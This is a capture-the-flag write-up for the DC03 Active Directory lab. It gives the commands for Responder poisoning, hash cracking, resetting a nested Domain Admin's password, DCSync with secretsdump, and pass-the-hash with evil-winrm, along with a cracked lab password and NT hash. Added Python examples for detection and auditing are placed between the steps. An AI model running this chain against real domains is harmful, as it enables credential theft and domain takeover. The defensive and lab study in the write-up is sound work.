DC03

After downloading this machine and configuring its network interface just like DC01, we perform an SMB sweep to find the machine we are going to hack:
Enumeration:
netexec smb 10.0.2.0/24

So the IP is 10.0.2.30; let's add it to the /etc/hosts file:

Perform an Nmap scan of all TCP ports:
sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local

It's another Active Directory machine.
We do not have a valid username and password, and we could not get anonymous access to SMB or LDAP. Beyond that, we can try some sniffing: listen for packets on the network with Wireshark to pick up useful information, or wait for a user to log in, since some companies do not care whether their internal networks use certificates; or we can run Responder and wait for a user to try to access a nonexistent share or file on the network. Note that we have to be on the same network segment to capture NTLMv2 hashes:
ifconfig

sudo responder -I eth0 -dwv
-I: Specify the interface.
-d: Enable answers for DHCP broadcast requests.
-w: Start the WPAD rogue proxy server.
-v: Increase verbosity.
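The defender's counterpart to what Responder does here is a canary query: the blue team multicasts an LLMNR lookup for a name that does not exist, and any host that answers is a poisoner. The following is an added example, not part of the original write-up or of the Responder project; the canary name, the transaction id and the multicast constants are the only assumptions, and the wire format is the DNS-style one LLMNR (RFC 4795) uses.

```python
import socket
import struct

# LLMNR (RFC 4795) multicast group and port; poisoners answer queries sent here.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS-style length-prefixed labels, terminated by a zero byte."""
    labels = [label.encode("ascii") for label in name.split(".") if label]
    return b"".join(bytes([len(lbl)]) + lbl for lbl in labels) + b"\x00"


def skip_name(data: bytes, off: int) -> int:
    """Return the offset just past the name starting at `off` (handles compression pointers)."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # 2-byte compression pointer ends the name
            return off + 2
        off += length + 1


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Build an LLMNR A-record query; the wire format is the same as a DNS query."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0 (query), QDCOUNT=1
    question = encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question


def parse_llmnr_response(data: bytes, txid: int):
    """Return the IPv4 answers in `data` if it is a response to our `txid`, else None."""
    if len(data) < 12:
        return None
    rid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:  # QR bit clear: this is not a response
        return None
    off = 12
    for _ in range(qdcount):  # skip the echoed question section
        off = skip_name(data, off) + 4
    answers = []
    for _ in range(ancount):
        off = skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:  # A record
            answers.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return answers


def probe_llmnr(canary_name: str, timeout: float = 2.0):
    """Multicast a query for a name that does not exist and collect every host that answers.

    On a clean segment nobody answers; each (source_ip, answers) pair is a poisoner candidate.
    """
    txid = 0x4242  # assumed fixed id; fine for a one-shot probe
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(canary_name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            answers = parse_llmnr_response(data, txid)
            if answers:
                hits.append((src, answers))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    # Hypothetical canary name; pick something no real host on the segment is called.
    for src, answers in probe_llmnr("fileserver-canary-q7x"):
        print(f"LLMNR poisoning suspected: {src} answered with {answers}")
```

Run it periodically from a host on each segment; one hit is enough to start looking for the machine at that source address. The fix that removes the attack surface altogether is the Group Policy setting "Turn off multicast name resolution" (LLMNR) together with disabling NetBIOS over TCP/IP on the adapters, since Responder poisons NBT-NS the same way.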


Here we got xkate578's NTLMv2 hash; we save it to a file and try to crack it:

hashcat xkate578.hash /usr/share/wordlists/rockyou.txt


It cracked, and this is the password.
Abuse ACLs:
Now that we have valid credentials, we can use LDAP to dump information about the domain with bloodhound-python (but that needs a DNS server for the domain) or with ldapdomaindump:
ldapdomaindump 10.0.2.32 -u 'soupedecode.local\xkate578' -p 'jesuschrist' --no-json --no-grep
-u: Specify the username.
-p: The password.
--no-json: Don't dump in JSON format.
--no-grep: Don't dump in grep format.

We can serve these files with a Python web server or open them directly in Firefox:
python3 -m http.server 80
-m: Run a module as a script.

Let's see what we have:

If we look at the user we own, we will see that it is a member of the Account Operators group, which lets us add accounts to groups or change users' passwords:

Also, if we look at Domain Admins, we will see that a group named operators is a member of it:

Let's check which users are in the operators group: if we change one of their passwords we effectively become a Domain Admin, because the operators group is nested in Domain Admins:
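The point the last three paragraphs make, that a user can be a Domain Admin without ever appearing in the Domain Admins member list, is exactly what an audit of nested group membership should surface. The example below is added here and is not the write-up's or ldapdomaindump's code; the group-to-members table is a constructed sample that mirrors the story (Administrator, operators, fbeth103, xkate578), not the real dump, and the set of privileged groups is an assumption you would extend for your domain.

```python
from collections import deque

# Constructed sample of group -> direct members, in the spirit of what ldapdomaindump's
# group pages show. Names mirror the write-up; the full membership lists are invented.
GROUPS = {
    "Domain Admins": ["Administrator", "operators"],
    "operators": ["fbeth103"],
    "Account Operators": ["xkate578"],
    "Domain Users": ["Administrator", "xkate578", "fbeth103"],
}

# Reaching any of these, directly or through nesting, is domain-wide admin (assumed list).
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}


def membership_paths(groups):
    """Map each principal to every nesting path that leads into it.

    A path starts at a top-level group and ends at the group the principal is a direct
    member of, e.g. fbeth103 -> [["Domain Admins", "operators"], ["operators"], ...].
    """
    paths = {}
    for top in groups:
        queue = deque([(top, [top])])
        while queue:
            group, path = queue.popleft()
            for member in groups.get(group, []):
                paths.setdefault(member, []).append(path)
                if member in groups and member not in path:  # nested group; skip cycles
                    queue.append((member, path + [member]))
    return paths


def effective_privileged_users(groups, privileged=PRIVILEGED):
    """Users (not groups) who land in a privileged group, with the chain that gets them there."""
    result = {}
    for principal, plist in membership_paths(groups).items():
        if principal in groups:
            continue  # report users only
        for path in plist:
            if path[0] in privileged:
                result.setdefault(principal, []).append(" -> ".join(path + [principal]))
    return result


def hidden_by_nesting(groups, privileged=PRIVILEGED):
    """Privileged users who never appear as a direct member of a privileged group.

    These are the ones a quick look at 'Domain Admins' misses, as with fbeth103 here.
    """
    hidden = set()
    for user, chains in effective_privileged_users(groups, privileged).items():
        if all(chain.count(" -> ") > 1 for chain in chains):
            hidden.add(user)
    return hidden


if __name__ == "__main__":
    for user, chains in effective_privileged_users(GROUPS).items():
        for chain in chains:
            print(chain)
    print("hidden by nesting:", sorted(hidden_by_nesting(GROUPS)))
```

Every user this reports should be treated like a direct Domain Admin: protected by the same password and monitoring policy, and not resettable by Account Operators. In a domain where AdminSDHolder/SDProp has run, the nested member inherits the protected ACL and the reset shown next would be refused, so a reset that succeeds is itself a finding worth investigating.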

We can use net rpc to change fbeth103's password, or we can use impacket-changepasswd:
net rpc password "fbeth103" 'Password!@#1' -U "soupedecode.local"/"xkate578"%"jesuschrist" -S "dc01.soupedecode.local"
-U: Specify the username.
-S: The domain controller.

Let's check if the password has been changed:
netexec smb soupedecode.local -u 'fbeth103' -p 'Password!@#1'

Now that we have a user that is part of Domain Admins, we can perform a DCSync to dump the domain hashes:
impacket-secretsdump soupedecode.local/'fbeth103:Password!@#1'@10.0.2.32
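Both steps above leave a clear trace on the domain controller: the password reset is logged as event 4724 (an attempt was made to reset an account's password), and a DCSync is a directory-service access logged as event 4662 carrying the replication control-access rights, which only domain controllers (and a few sync appliances) should ever exercise. The following detection logic is an added example, not part of the write-up or of any SIEM product; the events are constructed samples reduced to the fields the rules need, the non-replication GUIDs are placeholders, and the lists of privileged users and expected replicators are assumptions you would fill from your own domain.

```python
import re

# Control-access-right GUIDs a DCSync needs: the well-known AD replication extended rights.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}?")

# Constructed sample events (real 4662/4724 events carry many more fields). Actors mirror
# the write-up; the all-zero GUIDs stand in for object-type GUIDs and are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {00000000-0000-0000-0000-000000000001}"},
    {"EventID": 4724, "SubjectUserName": "xkate578", "TargetUserName": "fbeth103"},
    {"EventID": 4662, "SubjectUserName": "fbeth103", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {00000000-0000-0000-0000-000000000001}"},
    {"EventID": 4662, "SubjectUserName": "fbeth103", "AccessMask": "0x20",
     "Properties": "{00000000-0000-0000-0000-000000000002}"},
]


def detect(events, privileged_users, expected_replicators):
    """Return alerts as (rule, actor, detail) tuples, in event order."""
    alerts = []
    for ev in events:
        actor = ev.get("SubjectUserName", "")
        if ev.get("EventID") == 4662:
            # 0x100 = control access; replication rights are extended (control) rights
            if int(ev.get("AccessMask", "0"), 16) & 0x100 == 0:
                continue
            guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
            hits = sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))
            if hits and actor not in expected_replicators:
                alerts.append(("DCSYNC", actor, ", ".join(hits)))
        elif ev.get("EventID") == 4724:
            target = ev.get("TargetUserName", "")
            if target in privileged_users:
                alerts.append(("PRIV_PASSWORD_RESET", actor, target))
    return alerts


if __name__ == "__main__":
    # Assumed allow-list: DC machine accounts replicate legitimately; nobody else should.
    for rule, actor, detail in detect(SAMPLE_EVENTS, {"Administrator", "fbeth103"}, {"DC01$"}):
        print(f"{rule}: {actor} -> {detail}")
```

Event 4662 is only written when "Audit Directory Service Access" is enabled and the domain object's SACL audits control access, so check that auditing is actually on before relying on this rule; the privileged-user set is best fed from a nested-membership audit rather than from the direct Domain Admins list, since fbeth103 never appears there.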

We have the domain Administrator's NTLM hash, and now we can authenticate via SMB or WinRM:
evil-winrm -i 10.0.2.32 -u administrator -H 2176416a80e4f62804f101d3a55d6c93
-i: The IP address.
-H: Specify the NT hash.

Here is the root flag; the user flag can be found via smbclient or on xkate578's desktop.